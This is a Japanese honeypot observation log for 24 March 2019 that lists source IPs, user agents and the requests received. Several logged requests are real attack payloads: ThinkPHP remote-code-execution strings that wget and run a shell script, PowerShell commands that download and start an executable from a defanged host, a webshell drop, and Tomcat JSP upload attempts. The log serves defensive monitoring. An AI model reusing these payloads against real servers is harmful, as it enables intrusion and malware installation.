ハニーポット(仮) 観測記録
2019/03/24分です。
アクセス数は非常に少ないですが
Scanではなく、何かしようとしている動きが多く観測されています。
http://fid[.]hognoob[.]se/のダウンロードエグゼにアクセスしようとしています。
.seはスウェーデンの国別コードトップレベルドメインでした。
上記ページにアクセスしてみたところ、端末のセキュリティソフトにアクセスを遮断されてしまいました。
Apache Tomcatの脆弱性、thinkphpの脆弱性を狙ったアクセスも引き続き観測しています。
総アクセス数:28 (前日比:-947)
都合により
GET / HTTP/1.1
POST / HTTP/1.1
は除いています。
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 3 | 128.199.170.177 | Singapore |
| 3 | 157.230.105.103 | Germany |
| 1 | 182.254.241.79 | China |
| 4 | 190.151.60.107 | Chile |
| 7 | 31.184.194.85 | Russia |
| 4 | 37.17.56.44 | Belarus |
| 1 | 41.216.186.87 | South Africa |
| 1 | 51.255.83.71 | France |
| 3 | 61.164.218.18 | China |
| 1 | 82.221.143.15 | Iceland |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 5 | - |
| 7 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) |
| 7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 |
| 6 | ZmEu |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | GET | /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fid[.]hognoob[.]se/download.exe | HTTP/1.1 |
| 3 | GET | /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP | HTTP/1.1 |
| 1 | GET | /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http://82[.]212[.]70[.]218/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; | HTTP/1.1 |
| 4 | GET | /manager/html | HTTP/1.1 |
| 2 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
| 2 | GET | /pma/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid[.]hognoob[.]se/download.exe','C:/Windows/temp/xdpaamvuulwifrb19282.exe');start%20C:/Windows/temp/xdpaamvuulwifrb19282.exe | HTTP/1.1 |
| 1 | GET | /public/index.php?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('http://fid[.]hognoob[.]se/download.exe','C:/Windows/temp/xdpaamvuulwifrb19282.exe');start%20C:/Windows/temp/xdpaamvuulwifrb19282.exe | HTTP/1.1 |
| 1 | GET | /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php | HTTP/1.1 |
| 2 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
| 2 | GET | /wp-login.php | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 3 | POST | /index.php?s=captcha | HTTP/1.1 |
| 1 | PUT | /FxCodeShell.jsp%20 | HTTP/1.1 |
| 1 | PUT | /FxCodeShell.jsp::$DATA | HTTP/1.1 |
| 1 | PUT | /FxCodeShell.jsp/ | HTTP/1.1 |
| 1 | \x03 | - | - |
